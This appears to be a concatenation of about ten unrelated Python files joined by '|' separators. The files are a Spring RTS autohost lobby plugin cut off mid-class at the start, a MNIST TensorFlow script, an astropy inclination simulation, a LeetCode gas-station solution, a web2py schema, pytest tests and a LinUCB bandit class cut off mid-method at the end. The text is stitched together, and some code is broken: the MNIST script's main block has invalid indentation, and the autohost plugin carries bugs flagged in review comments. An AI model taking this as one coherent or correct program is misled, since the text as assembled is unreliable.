        self.noowner = True
        self.script = ""             # accumulated start-script text
        self.used = 0
        self.hosttime = 0.0
        self.redirectjoins = False
        self.gamestarted = False
        if platform.system() == "Windows":
            self.scriptbasepath = os.environ['USERPROFILE']
        else:
            self.scriptbasepath = os.environ['HOME']
        self.redirectspring = False
        self.redirectbattleroom = False
        self.users = dict()
        self.logger.debug( "INIT MoTH" )
        self.engineversion = ""
        self.u = None                # udpinterface.UDPint, created in onload()

    def ecb(self,event,data):
        # Engine event callback: optionally mirror engine traffic to the owner.
        if self.redirectspring:
            ags = []
            data2 = ""
            for c in data:
                if ord(c) < 17:
                    ags.append(ord(c))
                else:
                    data2 += c
            # NOTE(review): "#".join(ags) joins a list of ints and would raise
            # TypeError whenever a control byte was collected -- confirm.
            self.saypm(self.battleowner,"#"+str(event)+"#".join(ags)+" "+data2)

    # NOTE(review): this method is redefined near the bottom of the class; the
    # later definition wins, so this one is effectively dead code.
    def onloggedin(self,socket):
        self.hosted = 0
        self.sock = socket

    def mscb(self,p,msg):
        # Private-message callback from the UDP interface: forward the owner's
        # "!" commands into the running game as "/" commands.
        try:
            if p == self.battleowner:
                if msg.startswith("!"):
                    self.u.sayingame("/"+msg[1:])
        except Exception, e:
            self.logger.exception(e)
            exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
            self.sayex("*** EXCEPTION: BEGIN")
            for line in exc:
                self.sayex(line)
            self.sayex("*** EXCEPTION: END")

    def killbot(self):
        # Signal both the main loop and the UDP interface to shut down.
        self.logger.info( "setting force_quit True" )
        self.app.dying = True
        self.u.running = False

    def timeoutthread(self):
        # Watchdog: exits the bot if no battle becomes fully hosted in time.
        while 1:
            time.sleep(20.0)
            try:
                if not ( not self.noowner and self.hosted == 1) and not self.gamestarted:
                    self.logger.error("Timeouted hosting")
                    self.killbot()
                    return
            except Exception,e:
                self.logger.debug('hosting timeout')
                self.logger.exception(e)

    def getspringded(self, enginever):
        # Resolve the spring-dedicated executable for an engine version.
        # Returns "" when the binary is missing or not executable.
        ver = os.path.basename(enginever)
        res = self.app.config.get('tasbot', 'springdedpath').replace("{ENGINEVER}", ver)
        if os.path.isfile(res) and os.access(res, os.X_OK):
            return res
        return ""

    def getenginelist(self):
        # List installed engine versions that have a usable dedicated binary.
        vers = glob.glob(self.app.config.get('tasbot', 'springdedpath').split("{ENGINEVER}")[0] + "*")
        res = []
        for ver in vers:
            if not os.path.isdir(ver):
                continue
            name = os.path.basename(ver)
            if not self.getspringded(name):
                continue
            res.append(name)
        return sorted(res)

    def startspring(self,socket,g):
        # Run spring-dedicated with the script written for timestamp `g`,
        # relay its output into the battleroom, then clean up. Runs in its own
        # thread (started from oncommandfromserver on "!startgame").
        currentworkingdir = os.getcwd()
        try:
            self.u.reset()
            if self.gamestarted:
                socket.send("SAYBATTLEEX *** Error: game is already running\n")
                return
            self.output = ""
            socket.send("SAYBATTLEEX *** Starting game...\n")
            socket.send("MYSTATUS 1\n")
            st = time.time()
            #status,j = commands.getstatusoutput("spring-dedicated "+os.path.join(self.scriptbasepath,"%f.txt" % g ))
            springded = self.getspringded(self.engineversion)
            scripttxt = os.path.join(self.scriptbasepath,"%f.txt" % g )
            self.sayex('*** Starting spring: command line "%s %s"' % (springded, scripttxt))
            if self.app.config.has_option('tasbot', "springdatapath"):
                springdatapath = self.app.config.get('tasbot', "springdatapath")
                if not springdatapath in sys.path:
                    sys.path.append(springdatapath)
                os.chdir(springdatapath)
            else:
                springdatapath = None
            if springdatapath!= None:
                os.environ['SPRING_DATADIR'] = springdatapath
            self.pr = subprocess.Popen((springded, scripttxt),stdout=subprocess.PIPE,stderr=subprocess.STDOUT,cwd=springdatapath)
            self.gamestarted = True
            # Capture combined stdout/stderr until the process closes its pipe.
            l = self.pr.stdout.readline()
            while len(l) > 0:
                self.output += l
                l = self.pr.stdout.readline()
            status = self.pr.wait()
            self.sayex("*** Spring has exited with status %i" % status )
            et = time.time()
            if status != 0:
                socket.send("SAYBATTLEEX *** Error: Spring Exited with status %i\n" % status)
                # NOTE(review): this rebinds the parameter `g` to a list, which
                # makes the "%f.txt" % g cleanup below fail (silently) -- confirm.
                g = self.output.split("\n")
                for h in g:
                    self.sayex("*** STDOUT+STDERR: "+h)
                    # Throttle output relaying proportionally to line length.
                    time.sleep(float(len(h))/900.0+0.05)
            socket.send("MYSTATUS 0\n")
            socket.send("SAYBATTLEEX *** Game ended\n")
        except Exception,e:
            exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
            self.sayex("*** EXCEPTION: BEGIN")
            for line in exc:
                self.sayex(line)
            self.sayex("*** EXCEPTION: END")
        # Best-effort cleanup of the generated start script.
        try:
            if int(self.app.config.get('autohost', "keepscript")) == 0:
                os.remove(os.path.join(self.scriptbasepath,"%f.txt" % g))
        except Exception,e:
            self.logger.debug('failed to remove script')
        os.chdir(currentworkingdir)
        self.gamestarted = False
        if self.noowner == True:
            self.sayex("The host is no longer in the battle, exiting")
            self.logger.info("Exiting")
            self.killbot()

    def onload(self,tasc):
        # Plugin start: remember the app, start the watchdog thread and the
        # in-game UDP listener.
        try:
            self.tasclient = tasc
            self.app = tasc.main
            self.hosttime = time.time()
            self.start_thread(self.timeoutthread)
            if not self.u:
                self.u = udpinterface.UDPint(int(self.app.config.get('autohost', "ahport")),self.mscb,self.ecb)
        except Exception, e:
            self.logger.exception(e)

    def oncommandfromserver(self,command,args,s):
        # Dispatch on raw lobby-protocol commands received from the server.
        #print "From server: %s | Args : %s" % (command,str(args))
        self.sock = s
        if command == "RING" and len(args) > 0:
            s.send("RING " + self.app.config.get('autohost', "spawnedby") + "\n")
        if command == "CLIENTBATTLESTATUS" and len(args) > 0 and self.redirectbattleroom:
            self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]) )
        if command == "SAIDBATTLE" and len(args) > 0:
            if self.redirectbattleroom:
                self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]))
            if args[1].startswith("!") and args[0] == self.battleowner:
                # Owner typed a "!" command in the battleroom: forward in-game.
                try:
                    msg = " ".join(args[1:])
                    self.u.sayingame("/"+msg[1:])
                except Exception,e:
                    exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
                    self.sayex("*** EXCEPTION: BEGIN")
                    for line in exc:
                        self.sayex(line)
        if command == "SAIDBATTLEEX" and len(args) > 0 and self.redirectbattleroom:
            self.saypm(self.app.config.get('autohost', "spawnedby"), "!" + command + " " + " ".join(args[0:]))
        if command == "REQUESTBATTLESTATUS":
            s.send( "MYBATTLESTATUS 4194816 255\n" )#spectator+synced/white
        if command == "SAIDPRIVATE" and args[0] not in self.app.config.get('autohost', "bans") and args[0] == self.app.config.get('autohost', "spawnedby"):
            if args[1] == "!openbattle":
                if self.hosted == 1:
                    self.saypm(args[0],"E1 | Battle is already hosted")
                    return
                if len(args) < 6:
                    self.logger.error("Got invalid openbattle with params:" + " ".join(args))
                    return
                # last arg / first tab
                engineversion = " ".join(args).split("\t")[1]
                ded = self.getspringded(engineversion)
                if not ded:
                    self.logger.error("Invalid engine version received:" + engineversion)
                    self.saypm(args[0], "Engine version %s isn't installed on the relayhost. Available versions are: " %(engineversion))
                    for ver in self.getenginelist():
                        self.saypm(args[0], ver)
                    return
                self.logger.info("Using version %s for hosting" %(engineversion))
                self.engineversion = engineversion
                # Force our own host port into the forwarded OPENBATTLE args.
                args[5] = self.app.config.get('autohost',"hostport")
                self.logger.info("OPENBATTLE "+" ".join(args[2:]))
                s.send("OPENBATTLE "+" ".join(args[2:])+"\n")
                self.battleowner = args[0]
                return
            elif args[1] == "!supportscriptpassword":
                self.redirectjoins = True
                return
            elif self.hosted == 1 and args[0] == self.battleowner:
                # Owner-only relay commands once the battle is up.
                if args[1] == "!setingamepassword":
                    try:
                        msg = " ".join(args[2:])
                        self.u.sayingame("/adduser "+msg)
                    except Exception,e:
                        exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
                        self.sayex("*** EXCEPTION: BEGIN")
                        for line in exc:
                            self.sayex(line)
                if args[1] == "!addstartrect":
                    s.send("ADDSTARTRECT "+" ".join(args[2:])+"\n")
                if args[1] == "!setscripttags":
                    s.send("SETSCRIPTTAGS "+" ".join(args[2:])+"\n")
                if args[1] == "!removestartrect":
                    s.send("REMOVESTARTRECT "+" ".join(args[2:])+"\n")
                if args[1] == "!leavebattle":
                    s.send("LEAVEBATTLE\n")
                    self.hosted = 0
                if args[1] == "!updatebattleinfo":
                    s.send("UPDATEBATTLEINFO "+" ".join(args[2:])+"\n")
                if args[1] == "!kickfrombattle":
                    s.send("KICKFROMBATTLE "+" ".join(args[2:])+"\n")
                if args[1] == "!addbot":
                    s.send("ADDBOT "+" ".join(args[2:])+"\n")
                if args[1] == "!handicap":
                    s.send("HANDICAP "+" ".join(args[2:])+"\n")
                if args[1] == "!forceteamcolor":
                    s.send("FORCETEAMCOLOR "+" ".join(args[2:])+"\n")
                if args[1] == "!forceallyno":
                    s.send("FORCEALLYNO "+" ".join(args[2:])+"\n")
                if args[1] == "!forceteamno":
                    s.send("FORCETEAMNO "+" ".join(args[2:])+"\n")
                if args[1] == "!disableunits":
                    s.send("DISABLEUNITS "+" ".join(args[2:])+"\n")
                if args[1] == "!enableallunits":
                    s.send("ENABLEALLUNITS "+" ".join(args[2:])+"\n")
                if args[1] == "!removebot":
                    s.send("REMOVEBOT "+" ".join(args[2:])+"\n")
                if args[1] == "!updatebot":
                    s.send("UPDATEBOT "+" ".join(args[2:])+"\n")
                if args[1] == "!ring":
                    s.send("RING "+" ".join(args[2:])+"\n")
                if args[1] == "!forcespectatormode":
                    s.send("FORCESPECTATORMODE "+" ".join(args[2:])+"\n")
                if args[1] == "!redirectspring" and len(args) > 1:
                    try:
                        # Only another bot may toggle engine-traffic redirection.
                        if ( self.tasclient.users[self.battleowner].bot ):
                            self.redirectspring = bool(args[2])
                    except Exception,e:
                        exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
                        self.sayex("*** EXCEPTION: BEGIN")
                        for line in exc:
                            self.sayex(line)
                        self.sayex("*** EXCEPTION: END")
                if args[1] == "!redirectbattleroom"and len(args) > 1:
                    try:
                        if ( self.tasclient.users[self.battleowner].bot ):
                            self.redirectbattleroom = bool(args[2])
                    except Exception,e:
                        exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
                        self.sayex("*** EXCEPTION: BEGIN")
                        for line in exc:
                            self.sayex(line)
                        self.sayex("*** EXCEPTION: END")
                if args[1] == "!cleanscript":
                    self.script = ""
                if args[1] == "!appendscriptline":
                    self.script += " ".join(args[2:])+"\n"
                if args[1].startswith("#") and args[0] == self.battleowner:
                    # "#" prefix: raw in-game passthrough.
                    try:
                        msg = " ".join(args[1:])
                        self.u.sayingame(msg[1:])
                    except Exception,e:
                        exc = traceback.format_exception(sys.exc_info()[0],sys.exc_info()[1],sys.exc_info()[2])
                        self.sayex("*** EXCEPTION: BEGIN")
                        for line in exc:
                            self.sayex(line)
                if args[1] == "!saybattle":
                    s.send("SAYBATTLE "+" ".join(args[2:])+"\n")
                if args[1] == "!saybattleex":
                    s.send("SAYBATTLEEX "+" ".join(args[2:])+"\n")
                if args[1] == "!startgame":
                    if not self.gamestarted:
                        s.send("MYSTATUS 1\n")
                        g = time.time()
                        try:
                            os.remove(os.path.join(self.scriptbasepath,"%f.txt" % g))
                        except Exception,e:
                            pass
                        f = open(os.path.join(self.scriptbasepath,"%f.txt" % g),"a")
                        # Force the relayhost's own networking settings into the script.
                        self.script = addorreplace(self.script, "HostPort", self.app.config.get('autohost', 'hostport'))
                        self.script = addorreplace(self.script, "MyPlayerName", self.app.config.get('tasbot', "nick"))
                        self.script = addorreplace(self.script, "AutoHostPort", self.app.config.get('autohost', "ahport"))
                        if self.app.config.has_option('autohost', "bindip"):
                            self.script = addorreplace(self.script,"HostIP", self.app.config.get('autohost', "bindip"))
                        f.write(self.script)
                        f.close()
                        thread.start_new_thread(self.startspring,(s,g))
                    else:
                        self.saypm(args[0],"E3 | Battle already started")
            else:
                self.saypm(args[0],"E2 | Battle is not hosted")
        if command == "OPENBATTLE":
            self.battleid = int(args[0])
            self.used = 1
            self.sayex("Battle hosted succesfully , id is %s" % args[0])
        if command == "JOINEDBATTLE" and len(args) >= 2 and int(args[0]) == self.battleid:
            if args[1] == self.battleowner:
                self.hosted = 1
                self.noowner = False
                self.sayex("The host has joined the battle")
                s.send("SAYBATTLE Hello, the bot accepts all commands from normal spring prefixed with ! instead of /\n")
                s.send("SAYBATTLE read Documentation/cmds.txt for a list of spring commands\n")
                s.send("SAYBATTLE in order to stop a game immediately, use !kill\n")
            if self.redirectjoins:
                self.saypm(self.battleowner,command + " " + " ".join(args[0:])) # redirect the join command to the owner so he can manage script password
        if command == "SERVERMSG":
            self.saypm(self.battleowner," ".join(args))
        if command == "LEFTBATTLE" and int(args[0]) == self.battleid and args[1] == self.battleowner:
            if not self.gamestarted:
                self.sayex("The host has left the battle and the game isn't running, exiting")
                s.send("LEAVEBATTLE\n")
                # Best-effort: make sure any dedicated process is gone.
                try:
                    if platform.system() == "Windows":
                        handle = win32api.OpenProcess(1, 0, self.pr.pid)
                        win32api.TerminateProcess(handle, 0)
                    else:
                        os.kill(self.pr.pid,signal.SIGKILL)
                except Exception,e:
                    pass
                self.killbot()
            self.noowner = True
        if command == "REMOVEUSER" and args[0] == self.battleowner:
            if not self.gamestarted:
                self.sayex("The host disconnected and game not started, exiting")
                try:
                    if platform.system() == "Windows":
                        handle = win32api.OpenProcess(1, 0, self.pr.pid)
                        win32api.TerminateProcess(handle, 0)
                    else:
                        os.kill(self.pr.pid,signal.SIGKILL)
                except Exception,e:
                    pass
                self.killbot()
            self.noowner = True

    def onloggedin(self,socket):
        # (Re)login: forget hosting state; keep in-game status if running.
        self.noowner = True
        self.hosted = 0
        if self.gamestarted:
            socket.send("MYSTATUS 1\n")

    def saypm(self,p,m):
        # Send a private lobby message to player `p`.
        try:
            self.logger.debug("PM To:%s, Message: %s" %(p,m))
            self.tasclient.socket.send("SAYPRIVATE %s %s\n" %(p,m))
        except Exception, e:
            self.logger.exception(e)

    def say(self,m):
        # Say `m` in the autohost channel.
        try:
            self.logger.debug("SAY autohost %s\n" % m)
            self.tasclient.socket.send("SAY autohost %s\n" % m)
        except Exception, e:
            self.logger.exception(e)

    def sayex(self,m):
        # Emote-style ("/me") message in the autohost channel.
        try:
            self.logger.debug("SAYEX autohost %s\n" % m)
            self.tasclient.socket.send("SAYEX autohost %s\n" % m)
        except Exception, e:
            self.logger.exception(e)
|
"""
Geonomics Help (:mod:`geonomics.help`)
======================================
.. currentmodule:: geonomics.help
Memory Help
-----------
get_obj_size Get the full size of a complex object
Parameters Help
---------------
plot_movement Plot example movement tracks generated by the input
movement parameters
Background information
----------------------
Geonomics models can occupy a lot of memory, and also contain a large number of
parameters to be customized. The functions in this module aim to provide some
assistance in assessing Geonomics' behavior, so as to help users better plan,
introspect, and debug their models.
"""
from ._param_help import *
from ._memory_help import *
|
import pytest
# Run every test in this module under pytest-asyncio.
pytestmark = pytest.mark.asyncio


async def test_main():
    # Smoke test: verifies the async test plumbing works at all.
    assert True
|
# This file contains functions for training a TensorFlow model
import tensorflow as tf
import numpy as np
import os
# Directory (next to this file) where trained models are written.
MODEL_DIR = os.path.join(
    os.path.dirname(os.path.realpath(__file__)),
    'models'
)
def load_data():
    """Return MNIST train/test images (scaled to [0, 1], shaped NCHW) and labels."""
    mnist = tf.keras.datasets.mnist
    (x_train, y_train), (x_test, y_test) = mnist.load_data()
    # Scale pixel values from [0, 255] down to [0, 1].
    x_train, x_test = x_train / 255.0, x_test / 255.0
    # Insert a leading channel axis: (N, 1, 28, 28).
    shape = (-1, 1, 28, 28)
    x_train = np.reshape(x_train, shape)
    x_test = np.reshape(x_test, shape)
    return x_train, y_train, x_test, y_test
def build_model():
    """Assemble the small fully-connected MNIST classifier (flatten -> 512 relu6 -> 10 softmax)."""
    layers = [
        tf.keras.layers.InputLayer(input_shape=[1, 28, 28], name="InputLayer"),
        tf.keras.layers.Flatten(),
        tf.keras.layers.Dense(512),
        tf.keras.layers.Activation(activation=tf.nn.relu6, name="ReLU6"),
        tf.keras.layers.Dense(10, activation=tf.nn.softmax, name="OutputLayer"),
    ]
    return tf.keras.models.Sequential(layers)
def train_model():
    """Build, compile, fit and evaluate the MNIST model; return the trained model."""
    model = build_model()
    model.compile(
        optimizer='adam',
        loss='sparse_categorical_crossentropy',
        metrics=['accuracy'],
    )
    x_train, y_train, x_test, y_test = load_data()
    # Fit on the training split.
    model.fit(x_train, y_train, epochs=10, verbose=1)
    # Report held-out performance.
    test_loss, test_acc = model.evaluate(x_test, y_test)
    print("Test loss: {}\nTest accuracy: {}".format(test_loss, test_acc))
    return model
def maybe_mkdir(dir_path):
    """Create dir_path (including parents) if it does not already exist.

    Uses exist_ok=True so the check-then-create race in the previous
    version (os.path.exists followed by os.makedirs) cannot raise when
    another process creates the directory in between.
    """
    os.makedirs(dir_path, exist_ok=True)
def save_model(model):
    """Freeze the trained Keras model and write it as a GraphDef .pb file.

    Uses TF1-style session/graph APIs (tf.keras.backend.get_session,
    tf.graph_util.*), so it requires TensorFlow 1.x (or v1 compat mode).

    Args:
        model: A trained tf.keras model; its output op name is the freeze target.
    """
    output_names = model.output.op.name
    sess = tf.keras.backend.get_session()
    graphdef = sess.graph.as_graph_def()
    # Bake current variable values into constants, then strip training-only nodes.
    frozen_graph = tf.graph_util.convert_variables_to_constants(sess, graphdef, [output_names])
    frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)
    # Make directory to save model in if it doesn't exist already
    maybe_mkdir(MODEL_DIR)
    model_path = os.path.join(MODEL_DIR, "trained_lenet5.pb")
    with open(model_path, "wb") as ofile:
        ofile.write(frozen_graph.SerializeToString())
if __name__ == "__main__":
model = train_model()
save_model(model)
|
#km hm dam m dm cm mm
# Reads a length in metres and prints it converted to the other metric units.
medida=float(input('digite a medida em metros : '))
# Smaller units: multiply.
dm=medida*10
cm=medida*100
mm=medida*1000
# Larger units: divide.
dam=medida/10
hm=medida/100
km=medida/1000
print("""
a converção de metros para dm é {:.1f}
a converção de metros para cm é {:.1f}
a converção de metros para mm é {:.1f}
a converção de metros para dam é {:.1f}
a converção de metros para hm é {:.1f}
a converção de metros para km é {:.1f}""".format(dm,cm,mm,dam,hm,km))
|
import numpy as np
from astropy.table import Table
from astropy.io import ascii
# Degrees -> radians conversion factor, used throughout this script.
deg = np.pi/180.0

# np.random.seed(42)
np.random.seed(43)

# Number of synthetic disk/star systems to generate.
N_systems = 10

# let's get a sample of uniformly oriented disks in 3D space
# Generate randomly oriented momentum vector on the sky.
U = np.random.uniform(size=N_systems)
V = np.random.uniform(size=N_systems)
# spherical coordinates for angular momentum vector, uniformly distributed.
i_disks = np.arccos(2 * V - 1.0) / deg # polar angle
Omega_disks = 2 * np.pi * U / deg # azimuth
def calc_theta(i_disk, Omega_disk, i_star, Omega_star):
    '''
    Calculate the mutual inclination between two planes. Assumes all inputs in degrees.
    '''
    i1 = i_disk * deg
    i2 = i_star * deg
    dOmega = (Omega_disk - Omega_star) * deg
    # Spherical law of cosines between the two orbit normals.
    cos_theta = np.cos(i1) * np.cos(i2) + np.sin(i1) * np.sin(i2) * np.cos(dOmega)
    return np.arccos(cos_theta) / deg
# Rejection sampling for the distributions
def input_prob(theta):
    '''
    Target density for the mutual inclination (degrees): a Gaussian of mean
    5 deg and sigma 2 deg, weighted by the sin(theta) geometric prior.
    '''
    prior = np.sin(theta * deg)
    gauss = np.exp(-0.5 * (theta - 5.0)**2 / (2**2))
    return prior * gauss
def propose_prob(theta):
    '''
    Proposal density: the same Gaussian (mean 5 deg, sigma 2 deg) without the
    sin(theta) weighting. theta is in degrees.
    '''
    exponent = -0.5 * (theta - 5.0)**2/(2**2)
    return np.exp(exponent)
# proposed values
theta_props = np.random.normal(loc=5.0, scale=2.0, size=100000)
# since we know that the mutual inclination must be between 0 and 180, let's get rid of any values on the tail
# of the Gaussian that exceed these ranges
theta_props = theta_props[(theta_props > 0.0) & (theta_props < 180.0)]
# Evaluate the probability of Q for all samples
Qs = propose_prob(theta_props)
# Generate a random number [0, Q(Delta I)] for all samples
us = np.random.uniform(low=0, high=Qs)
# Evaluate p(Delta I) for all samples
Ps = input_prob(theta_props)
# Keep the samples for which u <= P
theta_samples = theta_props[us <= Ps]
# Draw the per-system mutual inclinations and random in-plane azimuths.
thetas = np.random.choice(theta_samples, size=N_systems) # degrees
phis = np.random.uniform(low=0, high=360., size=N_systems) # degrees
def P_x(xi):
    '''
    Calculate the transformation matrix about the X-axis. Assumes the angle is in degrees.
    '''
    angle = xi * deg
    c = np.cos(angle)
    s = np.sin(angle)
    return np.array([
        [1, 0, 0],
        [0, c, -s],
        [0, s, c],
    ])
def P_z(xi):
    '''
    Calculate the transformation matrix about the Z-axis. Assumes angle is in degrees.
    '''
    angle = xi * deg
    c = np.cos(angle)
    s = np.sin(angle)
    return np.array([
        [c, -s, 0],
        [s, c, 0],
        [0, 0, 1],
    ])
def get_xyz(theta, phi):
    '''
    Convert angles in the disk frame into x, y, z in the disk frame. All angles in degrees.
    '''
    t = theta * deg
    p = phi * deg
    st = np.sin(t)
    # Standard spherical-to-Cartesian unit vector.
    return np.array([st * np.cos(p), st * np.sin(p), np.cos(t)])
def get_binary_parameters(i_disk, Omega_disk, theta, phi):
    '''
    Using the matrix math above, calculate i_star and Omega_star. Assumes all angles are in degrees.
    '''
    xyz = get_xyz(theta, phi)
    # Rotate out of the disk frame: undo the inclination, then the node rotation.
    res = np.dot(P_z(-Omega_disk).T, np.dot(P_x(i_disk).T, xyz))
    X, Y, Z = res
    i_star = np.arccos(Z)/deg
    # the -90 is because the projection of the angular momentum vector on the X-Y plane
    # is not the same as the ascending node. There is a 90 degree offset between the two.
    Omega_star = np.arctan2(Y, X)/deg - 90.0
    return i_star, Omega_star
i_stars = np.empty(N_systems, np.float64) # degrees
Omega_stars = np.empty(N_systems, np.float64) # degrees
# Derive each system's stellar orientation from its disk orientation and the
# sampled mutual inclination/azimuth.
for i in range(N_systems):
    i_stars[i], Omega_stars[i] = get_binary_parameters(i_disks[i], Omega_disks[i], thetas[i], phis[i]);
# calculate the uncertainty assuming 1 degree and save this too
# we'll assume that the uncertainties on the fake data are a degree for both the disk and the binary
# and the error is on cos_i()
sd_disks = np.sin(i_disks * deg) * 1.0 * deg
sd_stars = np.sin(i_stars * deg) * 1.0 * deg
# compute the mutual inclination of these too, and add it as a column
# for fun, also store the phi column, since our posterior will have it
low_sample = Table([np.cos(i_disks * deg), sd_disks, Omega_disks, np.cos(i_stars * deg), sd_stars, Omega_stars, thetas, phis], names=["cos_i_disk", "cos_i_disk_err", "Omega_disk", "cos_i_star", "cos_i_star_err", "Omega_star", "theta", "phi"])
ascii.write(low_sample, "data/low_sample.ecsv", format="ecsv")
|
class Solution:
    def canCompleteCircuit(self, gas, cost):
        """Return the starting station index from which the circuit can be completed, or -1.

        Greedy single pass: whenever the running tank goes negative, no station
        up to (and including) the current one can be the answer, so restart just
        past it and accumulate the shortfall. The trip is possible iff the final
        surplus covers the accumulated shortfall.
        """
        candidate = 0   # best candidate starting index so far
        shortfall = 0   # total fuel owed by the discarded prefix
        surplus = 0     # running tank since the current candidate
        for station, (fuel, fee) in enumerate(zip(gas, cost)):
            surplus += fuel - fee
            if surplus < 0:
                candidate = station + 1
                shortfall += -surplus
                surplus = 0
        if surplus >= shortfall:
            return candidate
        return -1
|
# -*- coding: utf-8 -*-
# Schema for the 'article' table: identity, authorship, SEO metadata,
# publication scheduling, moderation state and soft-delete bookkeeping.
dh.define_table('article',
    Field('article_uuid', type='string',
        length=36,
        #default=uuid4(),
        required=True,
        requires=IS_NOT_EMPTY(),
        notnull=True,
        unique=True,
        label='Article ID',
        #comment=None,
        writable=False,
        readable=True,
        update=None),
    Field('ref_author', dh.author,
        length=None,
        #default=None,
        required=True,
        requires=IS_NOT_EMPTY(),
        notnull=True,
        unique=False,
        label='Author',
        #comment=None,
        writable=True,
        readable=True,
        update=None),
    Field('author_date', type='datetime',
        length=None,
        #default=datetime.utcnow(),
        required=False,
        #requires=IS_NOT_EMPTY(),
        notnull=False,
        unique=False,
        label='Author Date',
        #comment=None,
        writable=True,
        readable=True,
        update=None),
    Field('description', type='string',
        length=255,
        default=None,
        required=False,
        #requires=IS_NOT_EMPTY(),
        notnull=False,
        unique=False,
        label='Description',
        comment='This field is only for META Description of the article.',
        writable=True,
        readable=True,
        update=None),
    Field('meta_keys', type='string',
        length=255,
        default=None,
        required=False,
        #requires=IS_NOT_EMPTY(),
        notnull=False,
        unique=False,
        label='Keywords',
        comment='This field is only for META Keywords for the article.',
        writable=True,
        readable=True,
        update=None),
    Field('publish_after', type='datetime',
        length=None,
        #default=datetime.utcnow(),
        required=False,
        #requires=IS_NOT_EMPTY(),
        notnull=False,
        unique=False,
        label='Publish After',
        comment='The article will only appear if the current date equals or exceeds this timestamp.',
        writable=True,
        readable=True,
        update=None),
    Field('active_state', type='integer',
        length=None,
        default=1,
        required=True,
        requires=IS_INT_IN_RANGE(-1, 2),
        notnull=True,
        unique=False,
        label='Status',
        comment='-1:Blacklisted; 0:Inactive; 1:Active;',
        writable=True,
        readable=True,
        update=None),
    Field('cdate', type='datetime',
        length=None,
        #default=datetime.utcnow(),
        required=True,
        requires=IS_NOT_EMPTY(),
        notnull=True,
        unique=False,
        label='Create Date',
        #comment=None,
        writable=False,
        readable=True,
        update=None),
    # NOTE(review): the `update=` argument for mdate is commented out, so the
    # "Last Modified" timestamp is never refreshed automatically -- confirm.
    Field('mdate', type='datetime',
        length=None,
        #default=datetime.utcnow(),
        required=True,
        requires=IS_NOT_EMPTY(),
        notnull=True,
        unique=False,
        label='Last Modified',
        #comment=None,
        writable=False,
        readable=False,
        #update=datetime.utcnow()),
        ),
    Field('is_deleted', type='boolean',
        length=None,
        default=False,
        required=False,
        #requires=IS_NOT_EMPTY(),
        notnull=False,
        unique=False,
        #label='Deleted',
        #comment=None,
        writable=False,
        readable=False,
        update=None),
    migrate=True)
|
from fireo.fields import TextField, IDField, DateTime
from fireo.models import Model
from datetime import datetime
def test_fix_issue_77():
    """Regression test for fireo issue #77 (cursor-based pagination).

    Creates three documents, fetches a first page of two, then resumes
    from the returned cursor and verifies every fetched document has a
    non-None key.
    """
    class UserIssue77(Model):
        name = TextField()
        created_on = DateTime(auto=True)

    UserIssue77.collection.create(name="Azeem")
    # BUG FIX: was `namae="Haider"` -- a typo'd keyword that created a
    # document without its `name` field populated.
    UserIssue77.collection.create(name="Haider")
    UserIssue77.collection.create(name="Arfan")

    # First page: at most two documents created up to now.
    users = UserIssue77.collection.filter("created_on", "<=", datetime.now()).fetch(2)
    for user in users:
        assert user.key is not None
    c = users.cursor
    assert c is not None

    # Resume from the saved cursor; remaining documents must also have keys.
    user_list = UserIssue77.collection.cursor(c).fetch()
    for user in user_list:
        assert user.key is not None
|
import os
import pickle
import numpy as np
from numba import jit
from .ucb import UCB
@jit(nopython=True)
def calc_confidence_multiplier(confidence_scaling_factor, approximator_dim, iteration, bound_features,
                               reg_factor, delta):
    # LinUCB exploration-bonus multiplier:
    #   scale * sqrt(d * log(1 + t * L^2 / (lambda * d)) + 2 * log(1 / delta))
    # where d = approximator_dim, t = iteration, L = bound_features and
    # lambda = reg_factor.  Compiled with numba for per-step use.
    log_det_bound = np.log(1 + iteration * bound_features ** 2 / (reg_factor * approximator_dim))
    tail_term = 2 * np.log(1 / delta)
    return confidence_scaling_factor * np.sqrt(approximator_dim * log_det_bound + tail_term)
class LinUCB(UCB):
    """Linear UCB.

    Upper-Confidence-Bound bandit with a linear reward model
    (theta . features).  Supports checkpointing via ``save``/``load``;
    when ``load_from`` is given, internal state is restored from a
    pickled state dict instead of being freshly initialised.
    """
    def __init__(self,
                 bandit,
                 reg_factor=1.0,
                 delta=0.01,
                 bound_theta=1.0,
                 confidence_scaling_factor=0.0,
                 save_path=None,
                 load_from=None,
                 guide_for=0,
                 ):
        self.iteration = 0
        self.save_path = save_path
        if load_from is None:
            # range of the linear predictors
            self.bound_theta = bound_theta
            # maximum L2 norm for the features across all arms and all rounds
            self.bound_features = np.max(np.linalg.norm(bandit.features, ord=2, axis=-1))
            super().__init__(bandit,
                             reg_factor=reg_factor,
                             confidence_scaling_factor=confidence_scaling_factor,
                             delta=delta,
                             mock_reset=False,
                             guide_for=guide_for
                             )
        else:
            # Restore a checkpoint: mock_reset=True tells the superclass
            # not to re-initialise state that is overwritten just below.
            # NOTE(review): `guide_for` is not forwarded in this branch --
            # confirm whether that is intentional.
            state_dict = self.load(load_from)
            self.bound_theta = state_dict['bound_theta']
            self.bound_features = np.max(np.linalg.norm(bandit.features, ord=2, axis=-1))
            super().__init__(bandit,
                             reg_factor=reg_factor,
                             confidence_scaling_factor=confidence_scaling_factor,
                             delta=delta,
                             mock_reset=True,
                             )
            # Overwrite constructor arguments with the checkpointed values.
            self.reg_factor = state_dict['reg_factor']
            self.delta = state_dict['delta']
            self.bound_theta = state_dict['bound_theta']
            self.confidence_scaling_factor = state_dict['confidence_scaling_factor']
            self.A_inv = state_dict['A_inv']
            self.theta = state_dict['theta']
            self.b = state_dict['b']
            self.iteration = state_dict['iteration']
    def save(self, postfix=''):
        """Pickle the learner state to ``save_path/linucb_model_<postfix>.pt``.

        Falls back to the current directory when no save path was given.
        """
        if self.save_path is None:
            print("Save path is empty...saving here\n")
            self.save_path = './'
        state_dict = {
            'reg_factor': self.reg_factor,
